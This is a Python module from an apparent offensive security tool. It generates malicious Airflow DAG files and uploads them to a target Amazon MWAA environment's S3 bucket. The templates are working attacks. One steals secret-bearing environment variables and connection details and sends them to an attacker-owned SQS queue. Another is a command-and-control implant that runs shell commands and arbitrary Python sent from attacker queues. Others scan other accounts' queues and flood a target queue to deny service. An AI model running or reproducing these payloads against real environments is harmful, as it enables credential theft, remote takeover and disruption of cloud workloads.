"""
DAG Payload Generator

Generates Airflow DAG files that implement the various attack vectors
for deployment to a target MWAA environment via S3.

Each generated DAG is a standalone Python file that can be uploaded to
the MWAA DAGs S3 bucket.
"""

import json
import os
import textwrap
from typing import Optional

from ..config import (
    AttackerConfig,
    TargetConfig,
    DEFAULT_EXFIL_QUEUE,
    DEFAULT_C2_CMD_QUEUE,
    DEFAULT_C2_RESULTS_QUEUE,
)
from ..utils import (
    get_s3_client,
    print_section,
    print_success,
    print_fail,
    print_info,
    print_warn,
    print_result,
    logger,
)


def generate_exfiltration_dag(
    attacker: AttackerConfig,
    queue_name: str = DEFAULT_EXFIL_QUEUE,
    dag_id: str = "poc_mwaa_sqs_exfiltration",
    output_path: Optional[str] = None,
) -> str:
    """Generate the data exfiltration DAG."""
    code = textwrap.dedent(f'''\
        """
        MWAA SQS Data Exfiltration POC DAG
        Generated by mwaa_security_tool
        For authorized security testing only.
        """
        import json
        import os
        from datetime import datetime

        import boto3
        from airflow.models.dag import DAG
        from airflow.operators.python import PythonOperator

        ATTACKER_AWS_ACCOUNT_ID = "{attacker.account_id}"
        ATTACKER_QUEUE_NAME = "{queue_name}"
        ATTACKER_REGION = "{attacker.region}"


        def exfiltrate_data():
            """Collect and exfiltrate sensitive data via SQS."""
            # Gather data accessible to the execution role
            sts = boto3.client("sts")
            caller = sts.get_caller_identity()

            s3 = boto3.client("s3")
            buckets = [b["Name"] for b in s3.list_buckets().get("Buckets", [])]

            # Collect environment info
            env_vars = {{k: v for k, v in os.environ.items()
                        if any(x in k.upper() for x in
                               ["AWS", "AIRFLOW", "MWAA", "SECRET", "KEY", "TOKEN", "DB", "PASS"])}}

            # Attempt to read Airflow connections
            connections = []
            try:
                from airflow.models import Connection
                from airflow.utils.session import create_session
                with create_session() as session:
                    for conn in session.query(Connection).all():
                        connections.append({{
                            "conn_id": conn.conn_id,
                            "conn_type": conn.conn_type,
                            "host": conn.host,
                            "port": conn.port,
                            "login": conn.login,
                            "schema": conn.schema,
                        }})
            except Exception as e:
                connections = [{{"error": str(e)}}]

            payload = {{
                "caller_identity": caller,
                "s3_buckets": buckets,
                "sensitive_env_vars": env_vars,
                "airflow_connections": connections,
                "timestamp": datetime.utcnow().isoformat(),
            }}

            queue_url = f"https://sqs.{{ATTACKER_REGION}}.amazonaws.com/{{ATTACKER_AWS_ACCOUNT_ID}}/{{ATTACKER_QUEUE_NAME}}"
            sqs = boto3.client("sqs", region_name=ATTACKER_REGION)

            # Chunk large payloads (SQS max is 256KB)
            body = json.dumps(payload, default=str)
            chunk_size = 250000
            chunks = [body[i:i + chunk_size] for i in range(0, len(body), chunk_size)]

            for idx, chunk in enumerate(chunks):
                sqs.send_message(
                    QueueUrl=queue_url,
                    MessageBody=chunk,
                    MessageAttributes={{
                        "ChunkIndex": {{"DataType": "Number", "StringValue": str(idx)}},
                        "TotalChunks": {{"DataType": "Number", "StringValue": str(len(chunks))}},
                    }},
                )
            print(f"Exfiltrated {{len(chunks)}} chunk(s) to {{queue_url}}")


        with DAG(
            dag_id="{dag_id}",
            start_date=datetime(2023, 1, 1),
            schedule_interval=None,
            catchup=False,
            tags=["security", "poc"],
        ) as dag:
            PythonOperator(
                task_id="exfiltrate_data",
                python_callable=exfiltrate_data,
            )
    ''')

    if output_path:
        with open(output_path, "w") as f:
            f.write(code)
        print_success(f"DAG written to: {output_path}")

    return code


def generate_c2_implant_dag(
    attacker: AttackerConfig,
    cmd_queue: str = DEFAULT_C2_CMD_QUEUE,
    results_queue: str = DEFAULT_C2_RESULTS_QUEUE,
    dag_id: str = "c2_implant_sqs",
    poll_interval_minutes: int = 5,
    output_path: Optional[str] = None,
) -> str:
    """Generate the C2 implant DAG."""
    code = textwrap.dedent(f'''\
        """
        MWAA SQS C2 Implant DAG
        Generated by mwaa_security_tool
        For authorized security testing only.
        """
        import base64
        import json
        import subprocess
        import os
        from datetime import datetime, timedelta

        import boto3
        from airflow.models.dag import DAG
        from airflow.operators.python import PythonOperator

        ATTACKER_AWS_ACCOUNT_ID = "{attacker.account_id}"
        ATTACKER_REGION = "{attacker.region}"
        COMMAND_QUEUE_NAME = "{cmd_queue}"
        RESULTS_QUEUE_NAME = "{results_queue}"


        def c2_implant():
            """Poll for commands, execute, and return results via SQS."""
            sqs = boto3.client("sqs", region_name=ATTACKER_REGION)
            cmd_url = f"https://sqs.{{ATTACKER_REGION}}.amazonaws.com/{{ATTACKER_AWS_ACCOUNT_ID}}/{{COMMAND_QUEUE_NAME}}"
            results_url = f"https://sqs.{{ATTACKER_REGION}}.amazonaws.com/{{ATTACKER_AWS_ACCOUNT_ID}}/{{RESULTS_QUEUE_NAME}}"

            response = sqs.receive_message(
                QueueUrl=cmd_url,
                MaxNumberOfMessages=1,
                WaitTimeSeconds=10,
            )

            if "Messages" not in response:
                print("No commands pending.")
                return

            for message in response["Messages"]:
                receipt = message["ReceiptHandle"]
                command = message["Body"]
                print(f"Executing: {{command}}")

                # Handle special Python-prefixed commands
                if command.startswith("python:"):
                    try:
                        exec_globals = {{"boto3": boto3, "os": os, "json": json}}
                        exec(command[7:], exec_globals)
                        stdout = exec_globals.get("__result__", "executed")
                        if not isinstance(stdout, str):
                            stdout = json.dumps(stdout, default=str)
                        stderr = ""
                        rc = 0
                    except Exception as e:
                        stdout = ""
                        stderr = str(e)
                        rc = 1
                else:
                    try:
                        proc = subprocess.run(
                            command, shell=True,
                            capture_output=True, text=True, timeout=120,
                        )
                        stdout = proc.stdout
                        stderr = proc.stderr
                        rc = proc.returncode
                    except Exception as e:
                        stdout = ""
                        stderr = str(e)
                        rc = -1

                result = {{
                    "command": command,
                    "return_code": rc,
                    "stdout": base64.b64encode(stdout.encode()).decode(),
                    "stderr": base64.b64encode(stderr.encode()).decode(),
                    "hostname": os.uname().nodename,
                    "timestamp": datetime.utcnow().isoformat(),
                }}

                sqs.send_message(
                    QueueUrl=results_url,
                    MessageBody=json.dumps(result),
                )
                sqs.delete_message(QueueUrl=cmd_url, ReceiptHandle=receipt)
                print(f"Result sent, command message deleted.")


        with DAG(
            dag_id="{dag_id}",
            start_date=datetime(2023, 1, 1),
            schedule_interval=timedelta(minutes={poll_interval_minutes}),
            catchup=False,
            tags=["security", "c2"],
            max_active_runs=1,
        ) as dag:
            PythonOperator(
                task_id="c2_implant",
                python_callable=c2_implant,
            )
    ''')

    if output_path:
        with open(output_path, "w") as f:
            f.write(code)
        print_success(f"DAG written to: {output_path}")

    return code


def generate_recon_dag(
    attacker: AttackerConfig,
    target_account_ids: list,
    results_queue: str = "airflow-celery-recon-results",
    dag_id: str = "recon_sqs_scanner",
    output_path: Optional[str] = None,
) -> str:
    """Generate a DAG that performs SQS queue reconnaissance from within MWAA."""
    accounts_json = json.dumps(target_account_ids)
    code = textwrap.dedent(f'''\
        """
        MWAA SQS Infrastructure Reconnaissance DAG
        Generated by mwaa_security_tool
        For authorized security testing only.
        """
        import json
        from datetime import datetime

        import boto3
        from airflow.models.dag import DAG
        from airflow.operators.python import PythonOperator

        ATTACKER_AWS_ACCOUNT_ID = "{attacker.account_id}"
        ATTACKER_REGION = "{attacker.region}"
        RESULTS_QUEUE_NAME = "{results_queue}"
        TARGET_ACCOUNTS = {accounts_json}

        QUEUE_SUFFIXES = [
            "prod", "production", "dev", "development", "staging",
            "stage", "test", "default", "main", "primary",
        ]


        def scan_queues():
            """Scan target accounts for airflow-celery-* queues."""
            sqs = boto3.client("sqs", region_name=ATTACKER_REGION)
            results_url = f"https://sqs.{{ATTACKER_REGION}}.amazonaws.com/{{ATTACKER_AWS_ACCOUNT_ID}}/{{RESULTS_QUEUE_NAME}}"

            discovered = []
            for acct in TARGET_ACCOUNTS:
                for suffix in QUEUE_SUFFIXES:
                    queue_name = f"airflow-celery-{{suffix}}"
                    try:
                        resp = sqs.get_queue_url(
                            QueueName=queue_name,
                            QueueOwnerAWSAccountNumber=acct,
                        )
                        discovered.append({{
                            "account_id": acct,
                            "queue_name": queue_name,
                            "queue_url": resp["QueueUrl"],
                        }})
                        print(f"FOUND: {{acct}}/{{queue_name}}")
                    except Exception:
                        pass

            sqs.send_message(
                QueueUrl=results_url,
                MessageBody=json.dumps({{
                    "scan_type": "recon",
                    "discovered": discovered,
                    "accounts_scanned": len(TARGET_ACCOUNTS),
                    "timestamp": datetime.utcnow().isoformat(),
                }}),
            )
            print(f"Recon complete. {{len(discovered)}} queues found.")


        with DAG(
            dag_id="{dag_id}",
            start_date=datetime(2023, 1, 1),
            schedule_interval=None,
            catchup=False,
            tags=["security", "recon"],
        ) as dag:
            PythonOperator(
                task_id="scan_queues",
                python_callable=scan_queues,
            )
    ''')

    if output_path:
        with open(output_path, "w") as f:
            f.write(code)
        print_success(f"DAG written to: {output_path}")

    return code


def generate_dos_dag(
    target_account_id: str,
    target_queue_name: str,
    target_region: str = "us-east-1",
    message_count: int = 1000,
    dag_id: str = "dos_sqs_flood",
    output_path: Optional[str] = None,
) -> str:
    """Generate a DAG that floods a target queue with messages."""
    code = textwrap.dedent(f'''\
        """
        MWAA SQS DoS Simulation DAG
        Generated by mwaa_security_tool
        For authorized security testing only.
        """
        import json
        from datetime import datetime

        import boto3
        from airflow.models.dag import DAG
        from airflow.operators.python import PythonOperator

        TARGET_ACCOUNT_ID = "{target_account_id}"
        TARGET_QUEUE_NAME = "{target_queue_name}"
        TARGET_REGION = "{target_region}"
        MESSAGE_COUNT = {message_count}


        def flood_queue():
            """Send a batch of messages to the target queue."""
            sqs = boto3.client("sqs", region_name=TARGET_REGION)
            queue_url = f"https://sqs.{{TARGET_REGION}}.amazonaws.com/{{TARGET_ACCOUNT_ID}}/{{TARGET_QUEUE_NAME}}"

            sent = 0
            for i in range(MESSAGE_COUNT):
                try:
                    sqs.send_message(
                        QueueUrl=queue_url,
                        MessageBody=json.dumps({{
                            "type": "dos_test",
                            "seq": i,
                            "padding": "X" * 2048,
                        }}),
                    )
                    sent += 1
                except Exception as e:
                    print(f"Error at message {{i}}: {{e}}")
                    break

            print(f"Sent {{sent}}/{{MESSAGE_COUNT}} messages to {{queue_url}}")


        with DAG(
            dag_id="{dag_id}",
            start_date=datetime(2023, 1, 1),
            schedule_interval=None,
            catchup=False,
            tags=["security", "dos"],
        ) as dag:
            PythonOperator(
                task_id="flood_queue",
                python_callable=flood_queue,
            )
    ''')

    if output_path:
        with open(output_path, "w") as f:
            f.write(code)
        print_success(f"DAG written to: {output_path}")

    return code


def upload_dag_to_s3(
    target: TargetConfig,
    dag_code: str,
    dag_filename: str,
) -> bool:
    """Upload a generated DAG to the target MWAA S3 bucket."""
    print_section("DAG Deployment")

    if not target.s3_dag_bucket:
        print_fail("No S3 DAG bucket specified in target config.")
        return False

    s3 = get_s3_client(target.region, target.profile)
    s3_key = f"{target.s3_dag_prefix}{dag_filename}"

    print_info(f"Bucket: {target.s3_dag_bucket}")
    print_info(f"Key:    {s3_key}")

    try:
        s3.put_object(
            Bucket=target.s3_dag_bucket,
            Key=s3_key,
            Body=dag_code.encode("utf-8"),
            ContentType="text/x-python",
        )
        print_success(f"DAG uploaded: s3://{target.s3_dag_bucket}/{s3_key}")
        print_info("MWAA will pick up the DAG on its next scan interval.")
        return True

    except Exception as e:
        print_fail(f"Upload failed: {e}")
        return False


def generate_all(
    attacker: AttackerConfig,
    output_dir: str,
    target_accounts: Optional[list] = None,
) -> list:
    """Generate all DAG payloads and write them to the output directory."""
    print_section("Generating All DAG Payloads")
    os.makedirs(output_dir, exist_ok=True)

    files = []

    # Exfiltration DAG
    path = os.path.join(output_dir, "dag_exfiltration.py")
    generate_exfiltration_dag(attacker, output_path=path)
    files.append(path)

    # C2 Implant DAG
    path = os.path.join(output_dir, "dag_c2_implant.py")
    generate_c2_implant_dag(attacker, output_path=path)
    files.append(path)

    # Recon DAG
    if target_accounts:
        path = os.path.join(output_dir, "dag_recon.py")
        generate_recon_dag(attacker, target_accounts, output_path=path)
        files.append(path)

    print_success(f"Generated {len(files)} DAG payload(s) in {output_dir}")
    return files
